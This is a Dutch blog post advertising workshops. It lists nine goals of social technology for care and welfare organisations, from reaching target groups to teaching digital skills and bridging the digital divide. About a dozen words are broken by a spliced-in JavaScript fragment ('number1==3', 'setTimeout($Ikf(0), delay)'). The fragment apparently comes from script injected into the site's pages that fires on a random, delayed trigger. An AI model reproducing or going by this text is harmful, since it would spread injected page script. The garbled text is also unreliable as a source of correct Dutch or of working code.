Tag archieven: ondersteuning

De 9 doelen van sociale technologie / eSocial

Inschrijven nieuwsbrief

 

In het sociale domein wordt “sociale technologie” of “eSocial” steeds belangrijker; het toepassen van (online) technieken om maatschappelijke doelen te helpen bereiken. Daarmee gaat het maatschappelijke veld mee in de ontwikkeling van de zich digitaliserende netwerksamenleving. 

 

Vaak worden social media daarvoor als ingang genomen. Wellicht mede omdat dit het meest aansluit bij wat werkers in hun prive leven zelf al vaak toepassen. Sociale media zijn relatief eenvoudig op te starten en wie dat doet ervaart redelijk snel positief resultaat (reacties en interactie , uitbreidende netwerken, toegang tot kennis en sleutelposities, etc).Vanuit die ervaring wordt dan de vraag gesteld; “Moeten wij ook als organisatie niet “iets” met social media gaan doen?” 

 

Hieronder vind je een opsomming van doelen die daarbij gesteld worden. Van twee kanten benaderd.

 

Ten eerste de meest voorkomende benadering, sociale technologie toegepast vanuit organisatiebelangen. Maatschappelijke organisaties zoals o.a. in zorg en welzijn staan onder druk door de transitie en bezuinigingen, om waar voor hun geld te leveren en dat zichtbaar te maken. Profileren kan van levensbelang zijn.

 

Ten tweede de minder voorkomende aanvliegroute. Vanuit belangen van doelgroepen (van zorg en welzijn) gedacht. Deze benadering komt vooralsnog veel minder vaak voor. Maar sluit wel inhoudelijk goed aan op de dagelijkse praktijk van uitvoerende werkers in dit domein. Hier invulling aan geven is van wezenlijk belang, willen maatschappelijke organisaties werkelijk met droge ogen kunnen beweren dat hun doelgroepen mede dankzij hun inzet als volwaardige burgers meedoen in de partcipatie-maatschappij.

 

A. Vanuit organisatiebelang gedacht

 

1. Doelgroep
De doelgroep bereiken
Vindplaatsen: dichtbij bekende doelgroepen staan, als vanzelfsprekend onderdeel van hun leefwereld
Voelsprieten: online te weten komen waar en waarover mensen in problemen zitten via social media monitoring
Andere doelgroepen dan gewoonlijk bereiken, nieuwe afzetgebieden aanboren
Met name de 80% inwoners bereiken die iets voor de 15% in een achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andspositie kan betekenen
Door mogelijkheden van mensen in een kansarme positie zichtbaar te maken en te benadrukken naar 80% kansrijken
Meer contacten in de samenleving / het werkgebied / de wijken krijgen

 

2. Zichtbaarheid
Laten zien wat er al gedaan wordt
Iedere medewerker communiceert zelf over zijn / haar werk
Blijf dicht bij jezelf, wat maak jij mee en waar word jij blij van?
De werkzaamheden bekend maken onder een breder publiek
Niet afwachten tot een vraag naar je toekomt maar actief laten zien wat je waarde is
Een groter bereik onder inwoners bewerkstelligen
De naam van de organisatie steviger vestigen onder inwoners en samenwerkingspartners

 

3. Meegaan
Profileren als een moderne organisatie
Meegaan met de beweging die doelgroepen en stakeholders maken
Onderdeel uit maken van de netwerksamenleving / participatiesamenleving
Verbindende rol in de samenleving ook online oppakken, community building

 

4. Einddoel
Bij iedere inwoner in de broekzak zitten

 

B. Vanuit het belang van doelgroepen gedacht

 

5. Mediawijsheid / digivaardigheid / digitale zelfredzaamheid
Accepteren dat niet iedereen zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig mee komt in de digitale maatschappij
De 15% kansarmere helpen participeren in een digitaliserende samenleving
Oog hebben voor digitale achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden als onderdeel van multi-probleem situaties
Kennis van de digitaal geworden sociale kaart
Kennis van de valkuilen van digitale communicatie (wat is wel OK en wat niet)
Vaardigheden om binnen die sociale kaart je doelgroep zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig te leren de weg te vinden
Vaardigheden om per maatschappelijke instantie de verregaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gedigitaliseerde diensten af te nemen
Eigen kracht en zelfredzaamheid bevorderen door digitale vaardigheden bij te brengen

 

6. Overbruggen van de digitale kloof
Verkleinen van de afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de 80% die wel zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig functioneert met behulp van internet.
Moedeloosheid (ik kan het allemaal niet bijhouden) wegnemen
Helpen overzicht te krijgen op eigen situatie
Leren inzien dat de computer kunnen bedienen er in deze tijd bij hoort

 

7. Ondersteuning
De deeleconomie biedt praktische hulp, gratis of voor een wederdienst, via digitale kanalen zoals sociale media en speciale platformen
Ruilen of zelfs weggeven van diensten en goederen via online platforms
 • Goederen zoals kleding, schoenen
 • Eten
 • Woningen
 • Auto’s
 • Kennis bijvoorbeeld over moestuinen
 • Gezelschap
 • Oppas
 • Ontmoeting
 • Liefde, partner vinden

 

8. Thema’s
 • Vergrijzing:              hulp en zorg organiseren
 • Armoede:                de weg weten te vinden naar gratis diensten en goederen
 • Sociaal isolement:  betekenisvol contact met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen aangaan
 • Ontmoeting:           gelijkgestemden vinden
 • Community:            deel uitmaken van een groter geheel, meedoen, er bij horen
 •  Zorgnetwerken:     er niet alleen voor staan, informele hulpverlening, eigen kracht

 

9. Toegang
Praktische ondersteuning bieden, er naast zitten
Kleinschalige digitale oefenplekken in wijken
Opstapplaatsen om met lokale overheden (eParticipatie) en maatschappelijke instanties in contact te treden om zorg te regelen en te ontvangen
Digitaal vaardige Hulpverleners en vrijwilligers, die weten hoe je online kunt verbinden en activeren (opbouwwerk-methodieken)
Leren bedienen van apparatuur als tablets, smartphones en laptops
Leren hoe een abonnement op ADSL, Wifi en G4 afgesloten wordt
Leren bedienen van social media platformen

 

Workshops
Deze maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and geef ik de eerste workshops binnen welzijnsorganisaties waarin deze twee verschillende benaderingen centraal staan.
Meer informatie is bij mij te verkrijgen.
Neem contact op via  h.versteegh@welzijn30.nl
Of bel mij op 06-44062029.

 

Hans Versteegh
Welzijn 3.0